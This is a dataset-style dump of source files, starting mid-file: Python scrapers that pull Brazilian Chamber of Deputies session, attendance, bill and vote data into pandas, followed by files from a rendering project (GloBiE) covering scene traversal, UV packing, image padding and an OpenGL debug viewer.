urllib.request.urlopen(sessoesreunioes_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n Scodigo = item.find('codigo').text,\n data = item.find('data').text,\n numero = item.find('numero').text,\n tipo = item.find('tipo').text\n sessoesreunioes.append([Scodigo, data, numero, tipo])\n for gbn in item.findall('fasesSessao'):\n for fs in gbn.findall('faseSessao'):\n Fcodigo = fs.find('codigo').text,\n descricao = fs.find('descricao').text\n fasesSessao.append([Scodigo,Fcodigo, descricao])\n for ds in fs.findall('discursos'):\n for discurso in ds.findall('discurso'):\n for ora in discurso.findall('orador'):\n numero = ora.find('numero').text,\n nome = ora.find('nome').text\n horaInicioDiscurso = discurso.find('horaInicioDiscurso').text,\n txtIndexacao = discurso.find('txtIndexacao').text,\n numeroQuarto = discurso.find('numeroQuarto').text, \n numeroInsercao = discurso.find('numeroInsercao').text,\n sumario = discurso.find('sumario').text\n discursosSessao.append([Scodigo,Fcodigo, numero, nome, horaInicioDiscurso, txtIndexacao, numeroQuarto, numeroInsercao, sumario])\n\nsessoesreunioes_df = pd.DataFrame(sessoesreunioes, columns = [\"Scodigo\", \"data\", \"numero\", \"tipo\"])\nfasesSessao_df = pd.DataFrame(fasesSessao, columns = [\"Scodigo\", \"Fcodigo\", \"descricao\"])\ndiscursosSessao_df = pd.DataFrame(discursosSessao, columns = [\"Scodigo\",\"Fcodigo\", \"numero\", \"nome\", 
\"horaInicioDiscurso\", \"txtIndexacao\", \"numeroQuarto\", \"numeroInsercao\", \"sumario\"])\n\n\nListarPresencasDia_url = (\"http://www.camara.leg.br/SitCamaraWS/sessoesreunioes.asmx/\"\n \"ListarPresencasDia?data=23/11/2016&numLegislatura=&numMatriculaParlamentar=&siglaPartido=&siglaUF=\")\n\nListarPresencasDia = []\nwith urllib.request.urlopen(ListarPresencasDia_url) as res:\n data = ET.fromstring(res.read())\n\nfor item in data:\n for par in item:\n carteiraParlamentar = par.find('carteiraParlamentar').text,\n descricaoFrequenciaDia = par.find('descricaoFrequenciaDia').text,\n justificativa = par.find('justificativa').text,\n presencaExterna = par.find('presencaExterna').text,\n for se in par:\n for sed in se:\n inicio = sed.find('inicio').text,\n descricao = sed.find('descricao').text,\n frequencia = sed.find('frequencia').text\n ListarPresencasDia.append([carteiraParlamentar, descricaoFrequenciaDia, justificativa, presencaExterna, inicio, descricao, frequencia])\n \nListarPresencasDia_df = pd.DataFrame(ListarPresencasDia, columns=[\"carteiraParlamentar\", \"descricaoFrequenciaDia\", \"justificativa\", \"presencaExterna\", \"inicio\", \"descricao\", \"frequencia\"])\n\n\n\n\n\n \n" }, { "alpha_fraction": 0.5923113226890564, "alphanum_fraction": 0.5952539443969727, "avg_line_length": 40.15234375, "blob_id": "c158e1d7b5f9df4c54c74877767315392ac8fba9", "content_id": "378465a221c39909b65d767faac0eaa532705043", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10576, "license_type": "no_license", "max_line_length": 191, "num_lines": 256, "path": "/obter_proposicoes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import urllib\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport urllib.request\nimport urllib.parse\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\nimport mysqldb\n\nsiglas_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarSiglasTipoProposicao\")\nsiglas = []\n\nwith urllib.request.urlopen(siglas_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n tipoSigla = item.get('tipoSigla'),\n descricao = item.get('descricao'),\n ativa = item.get('ativa'),\n genero = item.get('genero')\n siglas.append([tipoSigla, descricao, ativa, genero])\n\nsiglas_df = pd.DataFrame(siglas, columns=[\"tipoSigla\", \"descricao\", \"ativa\", \"genero\"])\n\n\n\"\"\"Obtém a lista de situações para proposições.\"\"\"\nsituacoes_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarSituacoesProposicao\")\n\nsituacoes = []\nwith urllib.request.urlopen(situacoes_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n id = item.get('id'),\n descricao = item.get('descricao'),\n ativa = item.get('ativa')\n situacoes.append([id, descricao, ativa])\n\nsituacoes_df = pd.DataFrame(situacoes, columns=[\"id\", \"descricao\", \"ativa\"]) \n\n\ndef obter_tipos_autores():\n \"\"\"Obtém a lista de tipos de autores das proposições.\"\"\"\n tipos_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ListarTiposAutores\")\n tipos = []\n with urllib.request.urlopen(tipos_url) as res:\n data = ET.fromstring(res.read())\n for item in data:\n id = item.get('id'),\n descricao = item.get('descricao')\n tipos.append([id, descricao])\n \n tipos_df = pd.DataFrame(tipos, columns=[\"id\", \"descricao\"]) \n return tipos_df\n\ntipos_df = 
obter_tipos_autores()\n\n\ndef monta_proposicao(item):\n \"\"\"\n Monta as proposições recuperadas em data.\n Args:\n item (ElementTree): ElementTree de uma proposição do xml da camara.\n Return:\n prop (Proposicao): proposição.\n \"\"\"\n prop_det_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n \"ObterProposicaoPorID?%s\")\n prop = Proposicao(\n item.find('id').text,\n item.find('nome').text,\n item.find('numero').text,\n item.find('ano').text,\n item.find('datApresentacao').text,\n item.find('txtEmenta').text,\n item.find('txtExplicacaoEmenta').text,\n item.find('qtdAutores').text,\n item.find('indGenero').text,\n item.find('qtdOrgaosComEstado').text)\n\n #setando o tipo de proposicao\n tipo_prop = item.find('tipoProposicao')\n prop.set_tipo_proposicao(TipoProposicao(\n tipo_prop.find('id').text,\n tipo_prop.find('sigla').text,\n tipo_prop.find('nome').text))\n\n #setando o orgao numerador\n orgao_num = item.find('orgaoNumerador')\n prop.set_orgao_numerador(OrgaoNumerador(\n orgao_num.find('id').text,\n orgao_num.find('sigla').text,\n orgao_num.find('nome').text))\n\n #setando o regime\n regime = item.find('regime')\n prop.set_regime(Regime(\n regime.find('codRegime').text,\n regime.find('txtRegime').text))\n\n #setando a apreciacao\n apre = item.find('apreciacao')\n prop.set_apreciacao(Apreciacao(\n apre.find('id').text,\n apre.find('txtApreciacao').text))\n\n #setando autor1\n autor1 = item.find('autor1')\n prop.set_autor1(Autor(\n autor1.find('txtNomeAutor').text,\n autor1.find('idecadastro').text,\n autor1.find('codPartido').text,\n autor1.find('txtSiglaPartido').text,\n autor1.find('txtSiglaUF').text))\n\n #setando o último despacho\n ult_des = item.find('ultimoDespacho')\n prop.set_ultimo_despacho(UltimoDespacho(\n ult_des.find('datDespacho').text,\n ult_des.find('txtDespacho').text))\n\n #setando situacao\n sit = item.find('situacao')\n sit_prop = SituacaoProposicao(sit.find('id').text,\n sit.find('descricao').text)\n org = sit.find('orgao')\n orgao = Orgao(org.find('codOrgaoEstado').text,\n org.find('siglaOrgaoEstado').text)\n sit_prop.set_orgao(orgao)\n\n principal = sit.find('principal')\n princ = {\n 'cod_prop_principal':\n principal.find('codProposicaoPrincipal').text,\n 'prop_principal':\n principal.find('proposicaoPrincipal').text}\n sit_prop.set_prop_principal(princ)\n prop.set_situacao(sit_prop)\n\n params_det = urllib.parse.urlencode({'IdProp': prop.id_})\n with urllib.request.urlopen(prop_det_url % params_det) as res_d:\n detalhes = ET.fromstring(res_d.read())\n prop.set_tema(detalhes.find('tema').text)\n prop.set_indexacao(\n detalhes.find('Indexacao').text.split(','))\n prop.set_link_inteiro_teor(\n detalhes.find('LinkInteiroTeor').text)\n apensadas = detalhes.find('apensadas')\n for apensada in apensadas:\n apens = (apensada.find('nomeProposicao').text,\\\n apensada.find('codProposicao').text)\n prop.add_apensada(apens)\n\n return prop\n\ndef obter_proposicoes(sigla, anos):\n \"\"\"Obtém a lista de proposições que satisfaçam os argumentos.\n Args:\n sigla (str) - Padrão 'PL'\n anos (list) - Lista dos anos. 
Padrão [2011].\n        apensadas (boolean) - Se deve ou não buscar as proposições apensadas.\n        siglas (list) - lista dos tipos para buscas as proposições apensadas.\n    \"\"\"\n    prop_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n                \"ListarProposicoes?numero=&datApresentacaoIni=&\"\n                \"datApresentacaoFim=&idTipoAutor=&parteNomeAutor=&\"\n                \"siglaPartidoAutor=&siglaUFAutor=&generoAutor=&\"\n                \"codEstado=&codOrgaoEstado=&emTramitacao=&%s\")\n    \n    props = []\n    numeros = []\n    params = urllib.parse.urlencode({'sigla': 'PL', 'ano': 2016})\n    with urllib.request.urlopen(prop_url % params) as res:\n        data = ET.fromstring(res.read())\n        for item in data:\n            id = item.find('id').text,\n            nome = item.find('nome').text,\n            numero = item.find('numero').text,\n            ano = item.find('ano').text\n            for tipo in item.findall('tipoProposicao'):\n                tiposigla = tipo.find('sigla').text\n            for orgao in item.findall('orgaoNumerador'):\n                orgaosigla = orgao.find('sigla').text\n            datApresentacao = item.find('datApresentacao').text,\n            txtEmenta = item.find('txtEmenta').text\n            for regime in item.findall('regime'):\n                codRegime = regime.find('codRegime').text , \n                txtRegime = regime.find('txtRegime').text\n            for apreciacao in item.findall('apreciacao'):\n                txtApreciacao = apreciacao.find('txtApreciacao').text\n            for autor1 in item.findall('autor1'):\n                txtNomeAutor = autor1.find('txtNomeAutor').text \n                idecadastro = autor1.find('idecadastro').text\n                codPartido = autor1.find('codPartido').text \n                txtSiglaPartido = autor1.find('txtSiglaPartido').text\n                txtSiglaUF = autor1.find('txtSiglaUF').text \n            for ultimoDespacho in item.findall('ultimoDespacho'):\n                datDespacho = ultimoDespacho.find('datDespacho').text, \n                txtDespacho = ultimoDespacho.find('txtDespacho').text\n            for situacao in item.findall('situacao'):\n                situacaodescricao = situacao.find('descricao').text\n                for orgao in situacao.findall('orgao'):\n                    siglaOrgaoEstado = orgao.find('siglaOrgaoEstado').text \n                for principal in situacao.findall('principal'):\n                    proposicaoPrincipal = principal.find('proposicaoPrincipal').text \n            props.append([id, nome, numero, ano, tiposigla, orgaosigla, datApresentacao, txtEmenta, codRegime, txtRegime, txtApreciacao, txtNomeAutor, \n                          idecadastro, codPartido, txtSiglaPartido, txtSiglaUF, datDespacho, txtDespacho, situacaodescricao, siglaOrgaoEstado, proposicaoPrincipal ])\n\n    return props\n\n# run the download once so the module-level DataFrame below has data\nprops = obter_proposicoes('PL', [2016])\n\nprops_df = pd.DataFrame(props, columns=[\"id\", \"nome\", \"numero\", \"ano\", \"tiposigla\", \"orgaosigla\", \"datApresentacao\", \"txtEmenta\", \"codRegime\", \"txtRegime\", \"txtApreciacao\", \"txtNomeAutor\", \n                                        \"idecadastro\", \"codPartido\", \"txtSiglaPartido\", \"txtSiglaUF\", \"datDespacho\", \"txtDespacho\", \"situacaodescricao\", \"siglaOrgaoEstado\", \"proposicaoPrincipal\"]) \n\ndef obter_apensadas(apensadas, numeros):\n    \"\"\"\n    Método que obtem as proposições apensadas de prop.\n    Args:\n        apensadas (list): lista de apensadas para baixar.\n        numeros (list): número das proposições que já foram baixadas.\n    Return:\n        props (list): lista das proposicoes apensadas de prop.\n    \"\"\"\n    prop_url = (\"http://www.camara.gov.br/SitCamaraWS/Proposicoes.asmx/\"\n                \"ListarProposicoes?datApresentacaoIni=&\"\n                \"datApresentacaoFim=&idTipoAutor=&parteNomeAutor=&\"\n                \"siglaPartidoAutor=&siglaUFAutor=&generoAutor=&\"\n                \"codEstado=&codOrgaoEstado=&emTramitacao=&%s\")\n    props = []\n    for nome, _ in apensadas:\n        #recupera a sigla para a busca\n        sigla = nome.split() #a sigla mesmo é o elemento 0\n        numero = sigla[1][:sigla[1].find('/')] #tudo antes da /\n        ano = sigla[1][-4:] #4 
últimos dígitos\n\n        #se a proposição já foi baixada, não baixar novamente\n        if numero in numeros:\n            continue\n        params = urllib.parse.urlencode({'sigla': sigla[0],\n                                         'numero': numero,\n                                         'ano': ano})\n        with urllib.request.urlopen(prop_url % params) as res:\n            data = ET.fromstring(res.read())\n            #se não retornou nada, continua\n            if data.tag == 'erro':\n                continue\n            prop = monta_proposicao(data.find('proposicao'))\n            props.append(prop)\n            print('\\tAPENSADA: {} - {} {} (id: {})'.format(len(props),\n                                                           prop.nome,\n                                                           prop.ano,\n                                                           prop.id_))\n    return props\n" }, { "alpha_fraction": 0.6435832381248474, "alphanum_fraction": 0.6518424153327942, "avg_line_length": 33.19565200805664, "blob_id": "6d93aad042cc1837640686edbba31b65837ab4fe", "content_id": "b997967a6be0be482648f7a1e9df84bb54585412", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1579, "license_type": "no_license", "max_line_length": 86, "num_lines": 46, "path": "/obter_historico_votacoes.py", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "import urllib.request\nimport argparse\nimport os.path\nimport xml.etree.ElementTree as ET\nimport pickle as pkl\nimport pandas as pd \nimport sqlalchemy\nfrom sqlalchemy import create_engine\n\n\n\"\"\"Obtém a lista de situações para proposições.\"\"\"\nvotoprop_url = (\"http://www.camara.leg.br/SitCamaraWS/Proposicoes.asmx/\"\n                \"ObterVotacaoProposicao?tipo=PEC&numero=241&ano=2016\")\n\nvotoprop = []\nvotopar = []\n\nurl = urllib.request.urlopen(votoprop_url)\ndata = ET.fromstring(url.read())\ncount = 0\nfor item in data:\n    for vot in item.findall('Votacao'):\n        count += 1\n        for vots in vot.findall('votos'):\n            for dep in vots.findall('Deputado'):\n                deputado = dep.get('Nome')\n                voto = dep.get('Voto')\n                votoprop.append([deputado, voto, count])\n        for orie in vot.findall('orientacaoBancada'):\n            for ban in orie.findall('bancada'):\n                partido = ban.get('Sigla')\n                orientacao = ban.get('orientacao')  # read the bancada element itself, not the last deputy's vote\n                votopar.append([partido, orientacao, count])\n\nvotoprop_df = pd.DataFrame(votoprop, columns=[\"deputado\", \"voto\", \"votacao\"])\n\nvotoprop_df = votoprop_df.pivot(index='deputado', columns='votacao', values='voto')\nvotoprop_df = votoprop_df.fillna('5')\nvotoprop_df.to_csv('votoprop.csv', sep=',', encoding=\"latin1\")\n\n\nvotopar_df = pd.DataFrame(votopar, columns=[\"partido\", \"orientacao\", \"votacao\"])\n\nvotopar_df = votopar_df.pivot(index='partido', columns='votacao', values='orientacao')\nvotopar_df = votopar_df.fillna('5')\nvotopar_df.to_csv('votopar.csv', sep=',', encoding=\"latin1\")\n\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 66.4000015258789, "blob_id": "d2b139d286ae7f05ce7858b85a1127489a65b154", "content_id": "d6d58abd7666b3bc564e0435e8440eddd8c3df27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 338, "license_type": "no_license", "max_line_length": 162, "num_lines": 5, "path": "/README.md", "repo_name": "vinicius-dourado/chamberofdeputiesBrazil", "src_encoding": "UTF-8", "text": "# chamberofdeputiesBrazil\n\nThis repository contains extractors that access the Brazilian Parliament's web services and fetch the projects, speeches, transcriptions, deputies' data and so on.\n\nIn the file categorizacao_automatica.py, the aim is to read all the speeches and tag each deputy with the themes they are most related to.\n\n" } ]
7
cg-saarland/GloBiE
https://github.com/cg-saarland/GloBiE
f2a2cc30427cd6d7d56d78393961485b98ff5970
23cb52e8c06716667eca2c174f3f732b20315098
2ea5551f50b03d06f6098ea8c516c0653ceca508
refs/heads/master
2020-12-21T16:08:52.685177
2020-01-27T15:25:46
2020-01-27T15:25:46
236,484,857
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48022347688674927, "alphanum_fraction": 0.49206703901290894, "avg_line_length": 29.442176818847656, "blob_id": "40b32b0ae97275e7fa66b08e86b7cefe79f64d0b", "content_id": "783c4ce90c4884bc1666d8f624d70cc4533ce968", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4475, "license_type": "permissive", "max_line_length": 69, "num_lines": 147, "path": "/visitor.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import glm\n\nimport scene\n\n\nclass SceneVisitor:\n def visit_SceneNode(self, node: scene.SceneNode, direction: str):\n pass\n\n def visit_Group(self, group: scene.Group, direction: str):\n pass\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n pass\n\n\nclass MeshCounter(SceneVisitor):\n def __init__(self, start=0):\n self.count = start\n self.disable = False\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n if direction != 'forward' or self.disable:\n return\n self.count += 1\n # self.disable = True\n\n\nclass TriCounter(SceneVisitor):\n def __init__(self, start=0):\n self.count = start\n self.disable = False\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n if direction != 'forward' or self.disable:\n return\n self.count += len(mesh.triangles)\n # self.disable = True\n\n\nclass SimplePacker(object):\n def __init__(self, m: int, n: int, pixelSize: int):\n self.i = 0\n self.m = m\n self.n = n\n tileSize = pixelSize / max([m, n])\n self.paddedScaling = (tileSize - 1) / tileSize\n\n def bucket(self):\n y = self.i // self.m\n x = self.i % self.m\n if self.i > self.m * self.n - 1:\n return None\n self.i += 1\n M = glm.mat3(self.paddedScaling / self.m, 0, 0, 0,\n self.paddedScaling / self.n, 0, 0, 0, 1)\n M[2][0] = float(x) / self.m\n M[2][1] = float(y) / self.n\n\n # debug verbose\n # out = []\n # for child in M:\n # lines = repr(child).splitlines()\n # out.append(\" - %s\" % lines[0])\n # out += [\" \" * 3 + line for line in lines[1:]]\n # print(\" SimplePacker.bucket x: %d y: %d\\n%s\" %\n # (x, y, \"\\n\".join(out)))\n\n return M\n\n\nclass TransformedTriExtractor(SceneVisitor):\n def __init__(self,\n vertices,\n normals,\n texcoord,\n startIdx=0,\n globalTf=glm.mat4(1),\n packer=SimplePacker(4, 4, 1024)):\n self.vertices = vertices\n self.normals = normals\n self.texcoord = texcoord\n self.tfStack = []\n self.tf = globalTf\n self.idx = startIdx\n self.disable = False\n self.packer = packer\n self.mapping = {}\n\n def visit_Group(self, group: scene.Group, direction: str):\n if self.disable:\n return\n\n if direction == 'forward':\n self.tfStack.append(self.tf)\n self.tf = self.tf * group.transform\n else:\n self.tf = self.tfStack.pop()\n\n def visit_Mesh(self, mesh: scene.Mesh, direction: str):\n if self.disable:\n return\n if direction != 'forward':\n return\n\n # print(\"visitting mesh {} with geometry {}\".format(\n # mesh.parent.parent.name, mesh.parent.name))\n hasGlobalUVs = False\n for tri in mesh.triangles:\n if tri.globalUVs is not None:\n hasGlobalUVs = True\n\n # print(\" {}\".format(hasGlobalUVs))\n\n # if hasGlobalUVs:\n uvTf = self.packer.bucket()\n if uvTf is not None:\n allEntries = [x for col in uvTf for x in col]\n # print(\" allEntries\")\n # print(\" {}\".format(allEntries))\n self.mapping[mesh.parent.parent.name] = allEntries\n\n # print(\" {}\".format(mesh.triangles[0].globalUVs))\n for tri in mesh.triangles:\n\n for k in range(3):\n vi = glm.vec4(tri.vertices[k], 1.0)\n vo = self.tf * vi\n for i in range(3):\n 
self.vertices[self.idx, k, i] = vo[i] / vo[3]\n if tri.normals is not None:\n ni = glm.vec4(tri.normals[k], 0.0)\n no = self.tf * ni\n l = glm.length(no)\n if l > 0:\n for i in range(3):\n self.normals[self.idx, k, i] = no[i] / l\n if tri.globalUVs is None or uvTf is None:\n self.texcoord[self.idx, k, :] = [1.0, 1.0]\n else:\n ti = glm.vec3(tri.globalUVs[k], 1.0)\n to = uvTf * ti\n for i in range(2):\n self.texcoord[self.idx, k, i] = to[i] / to[2]\n\n self.idx += 1\n # self.disable = True\n" }, { "alpha_fraction": 0.5223880410194397, "alphanum_fraction": 0.6865671873092651, "avg_line_length": 16, "blob_id": "f6ab6601a852a7aa9a2c996aeabc9ae79de1f591", "content_id": "f627e27a21582dd76da11b9ffe0bf59a43acc209", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 67, "license_type": "permissive", "max_line_length": 21, "num_lines": 4, "path": "/requirements-dev.txt", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "pyglet>=1.4.8\nratcave>=0.8.0\npyInstaller>=3.5\nauto-py-to-exe>=2.6.6" }, { "alpha_fraction": 0.6941340565681458, "alphanum_fraction": 0.7108938694000244, "avg_line_length": 26.5, "blob_id": "ecf7cb815c0ffb247f86ab3874affae5a71e4961", "content_id": "0247c220e4299de755e2a864124196c6f3f2f447", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 716, "license_type": "permissive", "max_line_length": 157, "num_lines": 26, "path": "/README.md", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "\n# GloBiE\n\n## Prerequisites\n\n - Working [AnyDSL](https://github.com/AnyDSL/anydsl.git) build with [LLVM](http://releases.llvm.org/) including [RV](https://github.com/cdl-saarland/rv.git)\n - [CMake](https://cmake.org/)\n - [Python](https://www.python.org/) including development package\n - [pybind11](https://github.com/pybind/pybind11.git)\n\n## Build instructions\n\n```\n$ pip install -r requirements.txt\n$ pip install -r requirements-dev.txt\n$ mkdir build\n$ cd build && cmake -DAnyDSL_runtime_DIR=<path to anydsl_runtime-config.cmake> -Dpybind11_DIR=<path to pybind11-config.cmake> ..\n$ cmake --build build\n```\n\n## Running the webservice\n\n```\n$ python server.py\n```\n\nAccess to the exposed API via port 8080 by default.\n" }, { "alpha_fraction": 0.5483871102333069, "alphanum_fraction": 0.5717741847038269, "avg_line_length": 26.86516761779785, "blob_id": "9bb16512e118313391e97d077327544303a4b849", "content_id": "6baf0f613ffca95c912d8f66d768a7ab0b2ba8d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2480, "license_type": "permissive", "max_line_length": 66, "num_lines": 89, "path": "/blur.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "from PIL import Image\nimport numpy as np\n\nfrom service import default_out_dir\n\n\ndef clamp(n, smallest, largest):\n return max(smallest, min(n, largest))\n\n\n# assets for debugging\nDBG_blur_file = 'assets/4x5hard.png'\nDBG_blur_file = 'assets/4x5soft.png'\nDBG_blur_file = 'assets/border.png'\nDBG_blur_file = 'out/test.png'\n\nim_frame = Image.open(DBG_blur_file)\nimgData = im_frame.getdata()\n\nloaded = im_frame.load()\n\noriginalImg = np.array(imgData, np.uint8)\nnewImg = np.array(imgData, np.uint8)\n\nwidth = imgData.size[0]\nheight = imgData.size[1]\nnb = [\n [],\n [],\n [],\n [],\n # [],\n [],\n [],\n [],\n [],\n]\nfor column in range(0, width):\n for row in range(0, height):\n # pixel raster 
around center pixel\n        # 0 1 2\n        # 3 c 4\n        # 5 6 7\n        centerIdx = column + row * width\n        leftCol = clamp(column - 1, 0, width - 1)\n        rightCol = clamp(column + 1, 0, width - 1)\n        upperRow = clamp(row - 1, 0, height - 1)\n        lowerRow = clamp(row + 1, 0, height - 1)\n\n        nb[0] = originalImg[leftCol + upperRow * width]\n        nb[1] = originalImg[column + upperRow * width]\n        nb[2] = originalImg[rightCol + upperRow * width]\n\n        nb[3] = originalImg[leftCol + row * width]\n        centerPixel = originalImg[centerIdx]\n        nb[4] = originalImg[rightCol + row * width]\n\n        nb[5] = originalImg[leftCol + lowerRow * width]\n        nb[6] = originalImg[column + lowerRow * width]\n        nb[7] = originalImg[rightCol + lowerRow * width]\n\n        # check alpha channel\n        if centerPixel[3] == 0:\n\n            valid_pixels = list(filter(lambda x: x[3] > 0, nb))\n            lenValPix = len(valid_pixels)\n            if lenValPix > 0:\n                # take average of red channel\n                avg = 0\n                for ii in range(lenValPix):\n                    avg += valid_pixels[ii][0]\n                avg = int(avg / lenValPix)\n                loaded[column, row] = (avg, avg, avg, 255)\n\n        elif centerPixel[3] < 255:\n            # make semitransparent areas fully visible\n            loaded[column, row] = (centerPixel[0], centerPixel[1],\n                                   centerPixel[2], 255)\n    print(\"column %d of %d\" % (column, width))\n\n# pythonArray = newImg.tolist()\n# newImgAsImage = Image.fromarray(pythonArray, 'RGBA')\n# convertedImage = newImgAsImage.convert(\"RGB\")\n# convertedImage.save(\"art.png\")\n\n# assuming default_out_dir is a pathlib.Path (as in util.py), join with '/' instead of '+'\nim_frame.save(default_out_dir / \"padded.png\")\n\nim_frame.show()\nprint(\"huhu\")\n" }, { "alpha_fraction": 0.47089946269989014, "alphanum_fraction": 0.5464165210723877, "avg_line_length": 29.144927978515625, "blob_id": "4a80d8e0021d61635b4b571826ec493520a30bac", "content_id": "3ad08b04a30c0405520f405a2ccb0d44bd64dc6b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2079, "license_type": "permissive", "max_line_length": 79, "num_lines": 69, "path": "/util.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import hashlib\nimport glm\nimport scene\n\nfrom pathlib import Path\n\ndefault_out_dir = Path.cwd() / 'out'\nif not default_out_dir.exists():\n    default_out_dir.mkdir(parents=True)\n\n\n# https://en.wikipedia.org/wiki/ANSI_escape_code#3/4_bit\ndef colorprint(text: str, color: int) -> None:\n    print(\"\\x1B[1;\" + str(color) + \"m\" + text + \"\\x1B[m\")\n\n\ndef prepareOutFilename(inFileName: str, resolution: int) -> str:\n    utf8bytes: bytes = (inFileName + str(resolution)).encode(\"utf8\")\n    hash_object = hashlib.md5(utf8bytes)\n    result: str = \"AO_\" + hash_object.hexdigest()\n    return result\n\n\ndef joinOutputPath(filename: str, extension: str) -> str:\n    return default_out_dir / (filename + '.' 
+ extension)\n\n\ndef make_quad(v0, span0, span1):\n v1 = v0 + span0\n v2 = v0 + span0 + span1\n v3 = v0 + span1\n t0 = scene.Triangle(v0, v1, v2)\n t0.globalUVs = [glm.vec2(0.0, 0.0), glm.vec2(1.0, 0.0), glm.vec2(1.0, 1.0)]\n t1 = scene.Triangle(v2, v3, v0)\n t1.globalUVs = [glm.vec2(1.0, 1.0), glm.vec2(0.0, 1.0), glm.vec2(0.0, 0.0)]\n mesh = scene.Mesh('quad')\n mesh.add(t0)\n mesh.add(t1)\n return mesh\n\n\ndef test_scene():\n floor = scene.Group('.floor')\n floor.add(\n make_quad(glm.vec3(-4, 0, 0.8), glm.vec3(8, 0, 0), glm.vec3(0, 6, 0)))\n box = scene.Group('.box')\n s = 2.0\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0), glm.vec3(s, 0, 0),\n glm.vec3(0, 0, s)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0), glm.vec3(0, 0, s),\n glm.vec3(0, s, 0)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0), glm.vec3(0, s, 0),\n glm.vec3(s, 0, 0)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0, 1.0 + s), glm.vec3(s, 0, 0),\n glm.vec3(0, s, 0)))\n box.add(\n make_quad(glm.vec3(1.0 + s, 2.0, 1.0), glm.vec3(0, s, 0),\n glm.vec3(0, 0, s)))\n box.add(\n make_quad(glm.vec3(1.0, 2.0 + s, 1.0), glm.vec3(0, 0, s),\n glm.vec3(s, 0, 0)))\n root = scene.Group('.')\n root.add(floor)\n root.add(box)\n return root" }, { "alpha_fraction": 0.5686211585998535, "alphanum_fraction": 0.5869845151901245, "avg_line_length": 28.846153259277344, "blob_id": "d387a3a98a4ad09bce56024f3770e07281e1ac70", "content_id": "dc05d698627ea7d42833bca92761f8f67d047efb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3104, "license_type": "permissive", "max_line_length": 90, "num_lines": 104, "path": "/viewer.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import pyglet\nimport numpy\nimport ratcave\nimport PIL\n\nvert_shader = \"\"\"\n#version 120\n\nattribute vec3 vertexPosition;\nattribute vec2 vertexTexcoord;\n\nuniform mat4 projection_matrix, view_matrix, model_matrix;\n\nvarying vec2 fragTexCoord;\n\nvoid main()\n{\n\tgl_Position = projection_matrix * view_matrix * model_matrix * vec4(vertexPosition, 1.0);\n\tfragTexCoord = vertexTexcoord;\n}\n\"\"\"\n\nfrag_shader = \"\"\"\n#version 120\n\nuniform sampler2D TextureMap;\n\nvarying vec2 fragTexCoord;\n\nvoid main()\n{\n\tvec4 color = texture2D(TextureMap, fragTexCoord);\n\tgl_FragColor = vec4(color.rgb, 1.);\n}\n\"\"\"\n\n\ndef debug_view(vertices, texcoord, image=None, window_size=(800, 600)):\n # creates the window and sets its properties\n width, height = window_size\n window = pyglet.window.Window(width=width,\n height=height,\n caption='Debug Viewer',\n resizable=False)\n\n num_verts = 3 * vertices.shape[0]\n model = ratcave.Mesh(arrays=(vertices.reshape(num_verts, 3),\n texcoord.reshape(num_verts, 2)))\n model.position.xyz = 0, 0, -10\n\n if image is not None:\n image = image.transpose(PIL.Image.FLIP_TOP_BOTTOM)\n imgdata = pyglet.image.ImageData(image.width, image.height, 'RGBA',\n image.tobytes())\n mipmap = False\n tex = imgdata.get_mipmapped_texture(\n ) if mipmap else imgdata.get_texture()\n pyglet.gl.glBindTexture(pyglet.gl.GL_TEXTURE_2D, 0)\n model.textures.append(\n ratcave.Texture(id=tex.id, data=tex, mipmap=mipmap))\n\n scene = ratcave.Scene(meshes=[model])\n scene.camera.projection = ratcave.PerspectiveProjection(60.0,\n width /\n float(height),\n z_far=100.0)\n\n def update(dt):\n pass\n\n pyglet.clock.schedule(update)\n\n shader = ratcave.Shader(vert=vert_shader, frag=frag_shader)\n\n @window.event\n def on_resize(width, height):\n # TODO update 
